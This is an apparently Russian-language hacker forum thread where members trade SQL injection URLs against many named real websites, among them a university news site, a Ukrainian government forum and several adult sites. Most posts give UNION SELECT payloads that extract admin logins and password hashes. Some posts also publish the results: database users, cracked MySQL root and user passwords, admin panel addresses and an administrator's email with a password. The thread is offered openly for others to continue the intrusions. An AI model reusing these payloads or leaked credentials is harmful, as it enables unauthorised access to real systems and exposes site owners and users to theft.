Сообщений в теме: 96

[MoLoToK]

Ayda.ru

скуля

http://www.ayda.ru/stories/show_u.php?u=999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,
16/*

login и pass админа

http://www.ayda.ru/stories/show_u.php?u=999999+union+select+1,2,3,4,5,concat(login,0x3a,psw),7,
8,9,10,11,12,13,14,15,16+from+mkj_admin/*

login и пасс походу от сайта advalue.ru так как на одном хосте

http://www.ayda.ru/stories/show_u.php?u=999999+union+select+1,2,3,4,5,concat(login,0x3a,password),
7,8,9,10,11,12,13,14,15,16+from+users/*

[AFoST]

]]>http://www.centrgrou...rs where id=1/*]]>

]]>http://www.gala-euro...schema.tables/*]]>

[ENFIX]

Duke News
]]>http://dukemednews.duke]]>.edu

Сама скуля:

http://dukemednews.duke.edu/news/article.php?id=6041+and+1=0

Выводим столбцы:

http://dukemednews.duke.edu/news/article.php?id=6041+and+1=0+UNION+SELECT+1,2,3,4/*

//будут в самом низу справа

Выводим имя_пользователя:версию_бд:имя_бд:

http://dukemednews.duke.edu/news/article.php?id=6041+and+1=0+UNION+SELECT+1,2,
concat_ws(0x3a,user(),version(),database()),4/*

web@vml-news.duhs.duke.edu:4.0.18:news

File_priv выкл:

http://dukemednews.duke.edu/news/article.php?id=6041+and+1=0+UNION+SELECT+1,2,
load_file(0x2F6574632F706173737764),4/*

Есть доступ в mysql.user

http://dukemednews.duke.edu/news/article.php?id=6041+and+1=0+UNION+SELECT+1,2,
concat_ws(0x3a,user,password),4+from+mysql.user/*

Специально для вас расшифровал ;)

mnogosearch:0547d8b07eba42f3:gh34mx92
root:623460e26f081bbc:mt01du01
web:761b2fc844890384:fr56nv29

Соседствующие сайты:

1) news.mc.duke.edu
2) dukemednews.duke.edu
3) dukemednews.com
4) dukemednews.org

админка:

http://dukemednews.duke.edu/admin

Пока все

[$iD]

Скрытый текст

]]>http://www.ibtf.com....0,1 from admins]]>
]]>http://www.calbank.n...3,4,5,6,7,8,9/*]]>
]]>http://job.ukr.net/a...ers limit 0,1/*]]>

[Jinn]

http://www.masterkit.ru/main/set.php?num=-132+union+select+1,2,3,4,5,user(),7,8,9,10,11,12,13,14/*

[Stream]

[hide=10]http://www.sports.kz...3,4,5,6,7,8,9--[/hide]
Буду рад если кто-то доделает сам не разобрался.

[MoLoToK]

Stream (7.2.2008, 13:42) писал:

[HIDE=10]http://www.sports.kz...3,4,5,6,7,8,9--[/HIDE]
Буду рад если кто-то доделает сам не разобрался.

из нужных таблиц есть RemoteUsers И users, там есть колонки с пассвордами. Сайт очень иедленный поэтому позже доделаю.

[AFoST]

Ну так...Если кто хочет покапать дальше, я не заморачивался...
ekran.biz

pr=4/10
тиц=80

Скрытый текст

http://www.ekran.biz...string(version(),1,1)))>51*//*

[ENFIX]

PornoLib.Ru - сайт порно и эротических рассказов. Новые бесплатные порно рассказы. =))
Случайно наткнулся на сайтец в поиске темы для реферата))

в общем

http://pornolib.ru/list.php?g=%CF%EE%E4%F0%EE%F1%F2%EA%E8&link=752+and+1=0+union+select+1,2,concat_ws(0x3a,user(),version()),4,5,6,7,
8,9,10,11,12,13,14,15,16,17,18/*

kumarru@localhost:5.0.22

Ну и собственно запрос на получение пароля)

http://pornolib.ru/list.php?g=%CF%EE%E4%F0%EE%F1%F2%EA%E8&link=752+and+1=0+union+select+1,2,pass,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
+from+pornadminip+limit+0,2/*

redbaron

Админка:
]]>http://pornolib.ru/admin.php]]>

Велкам =)

[###]

http://www.kittens.black-cat.ru/display.php?city=-002+union+select+1,2,concat_ws(0x3a,login,pass)+from+users/*

http://www.gamer.hr/recenzije/mov.php?id=391+union+select+1,concat_ws(0x3a,password),3,4,5,6,7,8,9,10,11+from+user/*

http://www.anglofrenchbedandbreakfast.com/select.php?id=0+union+select+user(),2,3,4,5,6,version(),8,9,database(),11,12,13,14,15,16,
17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43
,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58/*

ENFIX

Цитата

Случайно наткнулся на сайтец в поиске темы для реферата))

Хехе... да ладна уже на рефераты все сваливать ^_^

[###]

http://www.linspire.com/lindows_news_pressreleases_archives.php?id=-240+union+select+version(),2/*

http://www.chrisbrunskill.co.uk/video.php?catid=-3+union+select+1,version(),3,4,5,6,7,8/*

[###]

[hide=10]_http://www.missvermont.org/missvermont_pageant.php?GetID=18+union+select+1,2, 3,version(),5,6,7,8,9,10,11/*
_http://www.fbrel.com.mo/branch_show_sub.php?getid=-1+union+select+1,user,password,4,5,6,7+from+mysql. user/*
_http://ovenjeans.ru/catalog.php?m=-1'+union+select+1,concat_ws(0x3e,login,password),3 ,4,5,6,7,8.9,10,11,12,13,14,15+FROM+oj_users/*
_http://www.globaleconomicgovernance.org/research.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),d atabase()),3,4,5,6,7/*
_http://www.feldgrau.com/main1.php?ID=-1+union+select+1,user(),3,database(),version(),6,7 ,8,9,10/*

Пройдемся по порнухе B)
_ttp://top.bur-bur.ru/top.php?cat=-1+union+select+1,2,3,4,concat_ws(0x3a,site_name,password,mail),6,7,8,9,10,11,12,13,14,15,16,17,18,19
,20,21,22,23,24,25,26+from+top_users/*
_http://flirt.mobipage.ru/index.php?page=view&uid=-1+union+select+1,2,3,concat_ws(0x3a,login,pass,mail),5,6,7+from+users/*
_http://prostitytki.ru/erotikslibs/comment.php?ID=-1+union+select+1,concat_ws(0x3a,login,password),3,4,5+from+system_user/*
_http://onal.ru/erolib/alist.php?aid=2575&link=-1+union+select+1,concat_ws(0x3a,login,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+sys tem_user/*
_http://ranx.ru/?showFoto=-1+union+select+1,2,concat_ws(0x3a,name,password,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+user
s/*[/hide]

[###]

[hide=5]
_http://www.unimed.com.ua/a-news/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9/*
_http://www.debet.kiev.ua/a-news/news.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
_http://eclipse.org.ua/a-news/news.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
_http://www.adm-km.gov.ua/forum/view.php?m_id=-1+union+select+1,2,3,4,5/*
[/hide]

[###]

http://www.qsrweb.com/research.php?rc_id=16+union+select+USER(),2,3,4,5,6,7,8,9

[###]

http://sportdreams.nl/news.php?lang=uk&template=news&id=-1+UNION+SELECT+1,2,3,4
http://www.maritime-elbe.de/schatzsuche/detail.php?show=-1/**/union/**/select/**/version(),1/*

[AFoST]

 http://psyforum.ru/pssite/article_list.php?id=-1)+union+select+1,2,3,convert(concat(user(),0x20,database(),0x20,version())+using+cp1251)/*

[Sleep]

http://www.specialradio.ru/mkz/?id=-1+union+select+1,version(),3,user(),5,6,7,8,9--

таблицы подбирать даже не пытался

[BACZ]

пятерка

[houssamo hois]

Цитата

]]>http://www.triennale...44,43,42,concat]]>  _ws(char(58,58),
ultimo_accesso,nome,cognome,testat  a,via,email,password,id_gruppo,richiesta_pass),40,  39,38,37,36,35,34,33,32,31,30,29,28,27,26,25,24,23  ,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,  4,3,2,1+from+utenti_stampa/*

[xUnu]

Уязвимое поле

http://savelev.ru/journal/case/more/?id=1

user(),database(),version() - savru_savru@localhost : savru_sav : 4.1.22-standard-log

[xUnu]

Уязвимая переменная

http://www.specialradio.ru/mkz/?id=1

user(),database(),version() - specialr_speci01@node2.hc.ru : wwwspecialradior_specialradio : 4.1.22

[xUnu]

[legion2k]

[Johkel3]

_http://yitramenje.ru/main.php?page=static&number=-1+UNION+SELECT+1,version(),3,4,5,6--

5.0.67-log:u23772@10.10.223.235:u23772

[xUnu]

http://www.addtime.ru/kom.php?id=39+union+select+table_name,table_name,3,4,concat_ws(char(42,42,42),user(),database(),version()),6+from+information_schema.tables--

user---

http://www.addtime.ru/kom.php?id=39+union+select+password,concat(0x3a,0x3a,login,0x3a,0x3a,password,0x3a,0x3a,memberid,0x3a,0x3a,sitename,0x3a,0x3a,email,0x3a,0x
3a,users),3,4,5,6+from+users

e-mail админа 9749591@mail.ru пасс - 4b571c59fa56bbece08207790f1cae85:i19671967o